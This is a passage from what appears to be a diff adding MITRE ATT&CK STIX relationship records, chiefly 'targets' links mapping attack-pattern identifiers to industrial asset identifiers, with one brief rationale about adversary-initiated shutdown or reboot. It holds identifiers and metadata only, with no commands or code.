"attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--28bb0caa-868b-4a39-a9b0-9a5203ee3527", + "created": "2024-06-25T13:25:46.823Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-25T13:25:46.823Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--28ce612b-1914-43ff-9327-0ae23d073f8c", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--28d5ada2-11de-4aad-a485-8c5aaa1f561b", + "created": "2024-05-23T04:19:55.543Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T00:49:05.222Z", + "description": "Asset Mapping Rationale: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI.", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--28e54398-1149-4e34-8a17-a0f1977416f3", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--28e89bca-04a2-462f-9d84-d5dc4d55d98e", + "created": "2023-09-28T21:26:47.115Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:26:47.115Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--28fa8fc4-e484-43e9-8f22-cde3f9177e23", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--29194291-8e7c-4b08-9236-fb8a87455891", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2921a49a-760d-4429-a250-4a38b73d2a99", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--29284c62-45b2-4650-88ac-fea62ddcd829", + "created": "2020-01-24T17:00:00.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2962f7cd-8785-4e58-b621-fc5d900fed31", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--296375b0-817d-4f42-afe1-4308f5edf973", + "created": "2023-09-28T21:10:25.193Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:10:25.193Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2967444c-ada8-461e-8e0a-32e70d3bc3fc", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--298348c3-2107-4eda-94b6-cc0c2089ca1a", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--29a21a9d-7851-42c9-baca-ba3237f3ddbb", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--29b8822a-c3c1-4ecc-8513-e2d016306ad0", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--29c2757d-c5f6-4c8d-bbdd-3629cb14dd81", + "created": "2023-09-29T18:46:39.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:46:39.854Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--29d55847-e749-4842-afb3-8680f15a0691", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--29e79148-b8ec-4cbc-b5d2-ffb366214646", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--29f64aca-8f77-4b7b-92c7-ada119203898", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2a2007d0-4bdc-4013-8cb0-8d01c9e34b3d", + "created": "2020-03-02T14:27:01.155Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "target_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2a28cf14-69d8-4fba-aae7-10b111ba6354", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2a41d3f8-6ada-477f-813a-3b36d7efb031", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2a451896-81aa-4eed-a444-4d04661adeeb", + "created": "2023-09-29T16:43:42.911Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:43:42.911Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2a665d0b-53b9-4263-a8a3-65c86d83f68e", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2a702811-9e03-44c0-875d-aef9de2cf73b", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2a7b49af-9a46-402c-af79-68c633510fae", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2a7e8bbc-dea6-4b7b-b974-055e309467d7", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2aaa6840-47fc-455c-9b19-1d27c3afccbe", + "created": "2023-09-28T19:38:46.361Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:38:46.361Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2ab07398-1e64-4bda-8784-8d3b88a22806", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2ab23021-32a6-465d-a464-5197291430c9", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2ab38687-8252-4f3a-a031-02a0d44898a1", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2abb5b64-532e-46b6-8421-5e959de9b9a3", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2acc09c9-1d8a-4339-9e38-d3cbb0b3bb45", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2add128f-acdf-448a-8fa0-02e75ff7e58a", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2ae75f1b-edc2-4999-ad0c-31d8b9cf7304", + "created": "2024-06-26T11:54:47.461Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T11:54:47.461Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2af20fc7-8adb-4920-92d5-d6712f087452", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2af5b732-2341-450f-afd4-c4cd8fae3cdb", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2af8a52a-b38a-4ebf-b0db-3d4b405c84ab", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + 